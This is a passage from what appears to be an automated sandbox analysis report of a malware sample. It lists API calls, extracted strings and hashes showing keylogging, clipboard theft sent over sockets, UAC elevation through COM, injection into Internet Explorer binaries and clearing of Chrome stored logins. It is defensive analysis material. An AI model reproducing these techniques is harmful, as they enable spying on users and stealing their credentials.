                                                                                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                                        • API String ID: 726551946-1743721670
                                                                                                                        • Opcode ID: 5c16329b9a02a26ed4ad2e5ced5aeb33c4d3ebd135ab666abfd55e6b2a8ed7c7
                                                                                                                        • Instruction ID: 62de1f72b86643dcc2fdff5f49c4e292dc8ee0fd1a5accd58eb40d7cbc95bd51
                                                                                                                        • Opcode Fuzzy Hash: 5c16329b9a02a26ed4ad2e5ced5aeb33c4d3ebd135ab666abfd55e6b2a8ed7c7
                                                                                                                        • Instruction Fuzzy Hash: 62714F315493618BCB14FB60D8A0EEFB7AAAFD1354F40092DE58A43199EF70A91DCF52
                                                                                                                        Function 02938754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0$1$2$3$4$5$6$7
                                                                                                                        • API String ID: 0-3177665633
                                                                                                                        • Opcode ID: 77d5cd8aaf056e9258b1366385515ef87f53ca98bdf260518538f1981b039363
                                                                                                                        • Instruction ID: 2106706c9f8d799812741df0b9057b0630ed6efeef011feea19e1ae83e8c7dcb
                                                                                                                        • Opcode Fuzzy Hash: 77d5cd8aaf056e9258b1366385515ef87f53ca98bdf260518538f1981b039363
                                                                                                                        • Instruction Fuzzy Hash: F1616B34508351AEDB06EF20D891FAE7BE6AF85750F40489DF991572E4DB709A0CCB53
                                                                                                                        Function 02926764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 02926788
                                                                                                                        • CoGetObject.OLE32(?,00000024,029859B0,00000000), ref: 029267E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object_wcslen
                                                                                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                        • API String ID: 240030777-3166923314
                                                                                                                        • Opcode ID: 72cf0fc82651f1442afe9a4ca641ea49a2fb49ab9a1c27585206fcdb6ab6f03b
                                                                                                                        • Instruction ID: e352afdbc85c4d958d56b7f7d8f84675c0642a8145afe36ddf6ba0707d38d2aa
                                                                                                                        • Opcode Fuzzy Hash: 72cf0fc82651f1442afe9a4ca641ea49a2fb49ab9a1c27585206fcdb6ab6f03b
                                                                                                                        • Instruction Fuzzy Hash: 221165B2901228AFEB14F7A4C845AEEB7FDDB84710F96006AE945E3144D7749A0CCF75
                                                                                                                        Function 029398C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,029948F8), ref: 029398D8
                                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 02939927
                                                                                                                        • GetLastError.KERNEL32 ref: 02939935
                                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0293996D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3587775597-0
                                                                                                                        • Opcode ID: bac0daa445bcd5925ce133e950e843206d6a7cc83606e9cf9e2ab4ff50921d7b
                                                                                                                        • Instruction ID: e1c43b892849c9f7002e113b873fb9dbf45aaada3ad87037ce111567bac53403
                                                                                                                        • Opcode Fuzzy Hash: bac0daa445bcd5925ce133e950e843206d6a7cc83606e9cf9e2ab4ff50921d7b
                                                                                                                        • Instruction Fuzzy Hash: D0814A31508310ABD718EB60DC94AAFB7A9AFD4710F50092EF58696194EF70EA19CF92
                                                                                                                        Function 029299E4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 02929A01
                                                                                                                        • SetWindowsHookExA.USER32(0000000D,029299D0,00000000), ref: 02929A0F
                                                                                                                        • GetLastError.KERNEL32 ref: 02929A1B
                                                                                                                          • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02929A6B
                                                                                                                        • TranslateMessage.USER32(?), ref: 02929A7A
                                                                                                                        • DispatchMessageA.USER32(?), ref: 02929A85
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                        • String ID: Keylogger initialization failure: error $`#v
                                                                                                                        • API String ID: 3219506041-3226811161
                                                                                                                        • Opcode ID: d9b952eee2ae153c570a625bd447b997f692063abeebc0e0cb161524ab8288e5
                                                                                                                        • Instruction ID: 01f01d5414c87c90cc5c100b531babfa8655d485c571365ba71188890dd4c4b5
                                                                                                                        • Opcode Fuzzy Hash: d9b952eee2ae153c570a625bd447b997f692063abeebc0e0cb161524ab8288e5
                                                                                                                        • Instruction Fuzzy Hash: D511E731944311AFE710BBB99C499BBB7ECEBD4620F50092DF895C2144FF20D918CBA2
                                                                                                                        Function 0293B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B489
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B4BB
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B529
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B536
                                                                                                                          • Part of subcall function 0293B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B50C
                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B561
                                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B568
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,029942E0,029942F8), ref: 0293B570
                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,029942E0,029942F8), ref: 0293B583
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2341273852-0
                                                                                                                        • Opcode ID: a6adbee6ebe5f702445c7ea74a4cf054079ea7db11ab714a7defd7001b184af2
                                                                                                                        • Instruction ID: 4bef675695981ef85a92c49941f285268d6b79888c6c1496bb07e0c04e341773
                                                                                                                        • Opcode Fuzzy Hash: a6adbee6ebe5f702445c7ea74a4cf054079ea7db11ab714a7defd7001b184af2
                                                                                                                        • Instruction Fuzzy Hash: F031647294811C9ADB21DBB0DC5CFEAB7BCAF55308F480995E555D2040EB729788CF24
                                                                                                                        Function 02929B10 Relevance: 12.1, APIs: 8, Instructions: 108keyboardthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 02929B3F
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 02929B4B
                                                                                                                        • GetKeyboardLayout.USER32(00000000), ref: 02929B52
                                                                                                                        • GetKeyState.USER32(00000010), ref: 02929B5C
                                                                                                                        • GetKeyboardState.USER32(?,?,00000000), ref: 02929B67
                                                                                                                        • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 02929B8A
                                                                                                                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02929BE3
                                                                                                                        • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 02929C1C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1888522110-0
                                                                                                                        • Opcode ID: 8af8ce005343b78b49756cedb3f3a057655abe03fa1d38a1931d6bdd91bc1996
                                                                                                                        • Instruction ID: 1930eea822dbf7e010660199e4575604a3dcaeb73e588ed2185b14a613b942ac
                                                                                                                        • Opcode Fuzzy Hash: 8af8ce005343b78b49756cedb3f3a057655abe03fa1d38a1931d6bdd91bc1996
                                                                                                                        • Instruction Fuzzy Hash: 153193B2588308AFD701DF94DC84FEBB7ECEB88714F410C2AB645D6190D7B1A55C8BA2
                                                                                                                        Function 02935A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32 ref: 02935A46
                                                                                                                        • EmptyClipboard.USER32 ref: 02935A54
                                                                                                                        • CloseClipboard.USER32 ref: 02935A5A
                                                                                                                        • OpenClipboard.USER32 ref: 02935A61
                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 02935A71
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 02935A7A
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 02935A83
                                                                                                                        • CloseClipboard.USER32 ref: 02935A89
                                                                                                                          • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2172192267-0
                                                                                                                        • Opcode ID: 60ff171c2ff101996c3ab4298109a4f46870884ab0a18e938559bd01b497fa25
                                                                                                                        • Instruction ID: a5ac32f97d311a258e63c0ea59bd22b71343615766cb4e7a9fba5cf5a567c7ab
                                                                                                                        • Opcode Fuzzy Hash: 60ff171c2ff101996c3ab4298109a4f46870884ab0a18e938559bd01b497fa25
                                                                                                                        • Instruction Fuzzy Hash: B40192316883109FC210BBF4EC59AFAF7AAEFC0711F41096DE80A86040DF30881D8A52
                                                                                                                        Function 0292B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0292B257
                                                                                                                        • GetLastError.KERNEL32 ref: 0292B261
                                                                                                                        Strings
                                                                                                                        • [Chrome StoredLogins not found], xrefs: 0292B27B
                                                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0292B222
                                                                                                                        • [Chrome StoredLogins found, cleared!], xrefs: 0292B287
                                                                                                                        • UserProfile, xrefs: 0292B227
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                        • API String ID: 2018770650-1062637481
                                                                                                                        • Opcode ID: b98bc3acf2c7d43a78a5aa7272783546f4e2f86c6546d39f95f0cf60e3091c28
                                                                                                                        • Instruction ID: 72ca6d88c0b3308eb5b90b475462f7cccf8593d72cdd1488d44dc31696d7290d
                                                                                                                        • Opcode Fuzzy Hash: b98bc3acf2c7d43a78a5aa7272783546f4e2f86c6546d39f95f0cf60e3091c28
                                                                                                                        • Instruction Fuzzy Hash: 04017D33A80224A7DB04B6B4EC7B8FE3769ADF0218B810119E017531DEFF41491CCAD1
                                                                                                                        Function 02936AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 02936AC4
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 02936ACB
                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02936ADD
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02936AFC
                                                                                                                        • GetLastError.KERNEL32 ref: 02936B02
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                        • API String ID: 3534403312-3733053543
                                                                                                                        • Opcode ID: d2044d047b9db088f3dc971c24c7ca821ad4a189beae487d0e7a4df576c047bb
                                                                                                                        • Instruction ID: 0694b2dbb0b289a2516220519417c2e1f800be211f4e1263d3f90329896cd7e6
                                                                                                                        • Opcode Fuzzy Hash: d2044d047b9db088f3dc971c24c7ca821ad4a189beae487d0e7a4df576c047bb
                                                                                                                        • Instruction Fuzzy Hash: 8FF0D4B5845129BBEB10ABE1DC0DEFFBFBCEF05655F000854B806E2141D6748A18CAB1
                                                                                                                        Function 029289A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 029289AE
                                                                                                                          • Part of subcall function 029241F1: socket.WS2_32(?,00000001,00000006), ref: 02924212
                                                                                                                          • Part of subcall function 0292428C: connect.WS2_32(?,?,?), ref: 029242A5
                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 02928A8D
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 02928AE0
                                                                                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 02928AF7
                                                                                                                          • Part of subcall function 02924468: WaitForSingleObject.KERNEL32(?,00000000,02921943,?,?,00000004,?,?,00000004,02995B70,02993EE8,00000000), ref: 0292450E
                                                                                                                          • Part of subcall function 02924468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,02995B70,02993EE8,00000000,?,?,?,?,?,02921943), ref: 0292453C
                                                                                                                          • Part of subcall function 029247EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 029247FD
                                                                                                                          • Part of subcall function 029247EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 02924808
                                                                                                                          • Part of subcall function 029247EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 02924811
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02928DA1
                                                                                                                          • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4043647387-0
                                                                                                                        • Opcode ID: 960108f995dd30402769f519dfc7571439cc2a725c02acd2f87fed6a17eeb070
                                                                                                                        • Instruction ID: 34c1f2041be8d0b1bcfefcf305d9c63528fb4d2cda377fd3bf6aed134f3acfb5
                                                                                                                        • Opcode Fuzzy Hash: 960108f995dd30402769f519dfc7571439cc2a725c02acd2f87fed6a17eeb070
                                                                                                                        • Instruction Fuzzy Hash: 19A17D329001289BDB18FBA0DC91EEEB77AAF94310F504569E416A70D9EF705E5DCFA0
                                                                                                                        Function 02939BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0293981A,00000000,00000000), ref: 02939BCD
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0293981A,00000000,00000000), ref: 02939BE2
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0293981A,00000000,00000000), ref: 02939BEF
                                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0293981A,00000000,00000000), ref: 02939BFA
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0293981A,00000000,00000000), ref: 02939C0C
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0293981A,00000000,00000000), ref: 02939C0F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 276877138-0
                                                                                                                        • Opcode ID: 1448b59b558753bcc008451cdbef3d767322e417e7e8675e4d1f8a9bf3e61efc
                                                                                                                        • Instruction ID: 064836bf0a71467e13b30121ced55b8bcf10996b886ba9dc51ce5bee0b12e0b0
                                                                                                                        • Opcode Fuzzy Hash: 1448b59b558753bcc008451cdbef3d767322e417e7e8675e4d1f8a9bf3e61efc
                                                                                                                        • Instruction Fuzzy Hash: DAF08272985225AFE2116A74AC88EFF7A6CEF866A1B000859F44593140CFA4CD5D9AB1
                                                                                                                        Function 029358B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02936AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 02936AC4
                                                                                                                          • Part of subcall function 02936AB7: OpenProcessToken.ADVAPI32(00000000), ref: 02936ACB
                                                                                                                          • Part of subcall function 02936AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02936ADD
                                                                                                                          • Part of subcall function 02936AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02936AFC
                                                                                                                          • Part of subcall function 02936AB7: GetLastError.KERNEL32 ref: 02936B02
                                                                                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 0293595B
                                                                                                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 02935970
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02935977
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                        • String ID: PowrProf.dll$SetSuspendState
                                                                                                                        • API String ID: 1589313981-1420736420
                                                                                                                        • Opcode ID: 6fd43c9f9834b6b45be7734d2a290ddbcc9e95b0fd5b80722415eb13e410a75d
                                                                                                                        • Instruction ID: f43a2619d9fb2a7c8af150546331109879d1ebf72e06b6b6858864783a6c975b
                                                                                                                        • Opcode Fuzzy Hash: 6fd43c9f9834b6b45be7734d2a290ddbcc9e95b0fd5b80722415eb13e410a75d
                                                                                                                        • Instruction Fuzzy Hash: 96218260604361D6CA15FBF0E864ABF729FDFC8744F854C19A40AAB18AEF64D81DCB51
                                                                                                                        Function 029711E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,02971502,?,00000000), ref: 0297127C
                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,02971502,?,00000000), ref: 029712A5
                                                                                                                        • GetACP.KERNEL32(?,?,02971502,?,00000000), ref: 029712BA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                        • Opcode ID: 7bfc6c082323c2a741537e4e4d1cf7abe0b694215c1a96a9377257f84540fad4
                                                                                                                        • Instruction ID: 4346b4eccab091bed8cc0f323dc8296b4adcd836c585db6ae8638c23ce6a50d4
                                                                                                                        • Opcode Fuzzy Hash: 7bfc6c082323c2a741537e4e4d1cf7abe0b694215c1a96a9377257f84540fad4
                                                                                                                        • Instruction Fuzzy Hash: F021C232B04105E7DB34CF94D900BABB3AAEF64A64B468964E90EDB510F732DE40CB90
                                                                                                                        Function 0293A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0293A650
                                                                                                                        • LoadResource.KERNEL32(00000000,?,?,0292E183,00000000), ref: 0293A664
                                                                                                                        • LockResource.KERNEL32(00000000,?,?,0292E183,00000000), ref: 0293A66B
                                                                                                                        • SizeofResource.KERNEL32(00000000,?,?,0292E183,00000000), ref: 0293A67A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                        • String ID: SETTINGS
                                                                                                                        • API String ID: 3473537107-594951305
                                                                                                                        • Opcode ID: d3ceeebe25f8e8d9a1964b358287d51a18cf6565527000b4b94aca3657a64160
                                                                                                                        • Instruction ID: 295bc709420f8032f0e87783cd4a2fd70dcbdf1ca9c30e1e4e57a7d0194db326
                                                                                                                        • Opcode Fuzzy Hash: d3ceeebe25f8e8d9a1964b358287d51a18cf6565527000b4b94aca3657a64160
                                                                                                                        • Instruction Fuzzy Hash: D1E01A3AA84311EBDB211BA9AC4CDA7BF39FBC67663040866FA05C2214DA318824CB50
                                                                                                                        Function 02930B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029305B9: SetLastError.KERNEL32(0000000D,02930B38,?,00000000), ref: 029305BF
                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02930B15), ref: 02930BC4
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 02930C2A
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02930C31
                                                                                                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02930D3F
                                                                                                                        • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02930B15), ref: 02930D69
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3525466593-0
                                                                                                                        • Opcode ID: 86e69f22422a05fbd82cfcea1bb433018fc9759ff3bbd4e0e058eb95d0d78f33
                                                                                                                        • Instruction ID: 68a6fbd22d49f2cb852e8f90a40b96be262dbefcb2e28195d9004b0ff4f18812
                                                                                                                        • Opcode Fuzzy Hash: 86e69f22422a05fbd82cfcea1bb433018fc9759ff3bbd4e0e058eb95d0d78f33
